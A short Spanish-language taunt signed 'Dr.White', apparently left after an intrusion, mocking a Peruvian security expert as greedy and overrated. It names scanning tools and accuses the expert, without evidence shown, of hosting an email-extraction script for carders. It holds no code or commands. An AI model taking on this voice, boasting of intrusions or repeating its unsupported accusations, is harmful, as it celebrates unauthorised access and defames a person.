lo que me da mas tristesa es que alguien que tiene una mentalidad tan pobre y solo le importa la plata pueda ser tan reconocido como experto en seguridad... señor... yo no lo hago con intensión de demostrar que puedo usar un scanner ni que se como funciona el SQL o el nikto o como se usa un editor hexadecimal lo hago porque usted se la da de experto se mantiene arriba y gente buena inteligente... empresas de seguridad peruana que si valen la pena hackers encarcelados con mucho mas talento que usted estan pobres...

Gobierno Peruano... Peruano piensen un poco quien MIERDA comanda el pais y a quien escuchamos en las noticias.

Que quede claro que esos Anonymous tambien me llegan al webo asi que ni crean que hago esto por apoyarlos.

PD: señor http://www.vilsol.com/sql/extract.php no se que hace con un script para extraer correos... eso es de carders y ladrones...no me diga... estab provando? ja! y el bot?

Saludos
Dr.White